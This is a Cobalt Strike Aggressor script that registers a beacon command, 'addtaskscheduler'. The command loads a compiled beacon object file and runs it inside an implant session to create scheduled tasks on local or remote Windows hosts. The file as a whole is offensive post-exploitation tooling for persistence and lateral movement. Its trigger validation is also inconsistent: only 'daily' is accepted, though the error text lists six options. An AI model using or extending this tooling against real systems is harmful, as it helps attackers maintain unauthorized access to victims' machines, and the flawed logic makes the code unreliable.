# Author: WolfMan12333

beacon_command_register(
	"addtaskscheduler", "Create a scheduled task (local and remote system support).",
	"INFO:\nCreate a scheduled task on the current system or a remote host.\n\n");
	
alias addtaskscheduler {
    $bid = $1;
	$taskName = $2;
    $programPath = $3;
	$triggerType = $4; 
	$optionalArg1 = $5;

	# Verify user input
	if ($taskName eq "") {
		berror($bid, "Please specify a name for the new scheduled task.\n");
		return;
	}
	
	if ($programPath eq "") {
		berror($bid, "Please specify the path to the program that you want to run\n");
		return;
	}
	
	if ($triggerType eq "daily") {
		if ($triggerType eq "daily") {
			if ($optionalArg1 eq "") {
				berror($bid, "Please specify the start time of the task in the following format: 2023-03-24T12:08:00.\n");
				return;
			}
		}
	}
	else {
		berror($bid, "This trigger option is not supported. Please select one of the following options: onetime | daily | logon | startup | lock | unlock\n");
		return;
	}
	
    # Read in the right BOF file
    $handle = openf(script_resource("addtaskscheduler.o"));
    $data   = readb($handle, -1);
    closef($handle);

	if ($triggerType eq "daily") {
		$arg_data  = bof_pack($bid, "ZZzZ", $taskName, $programPath, $triggerType, $optionalArg1);
	}

	blog($bid, "Tasked to create scheduled task..");
    beacon_inline_execute($bid, $data, "go", $arg_data);

}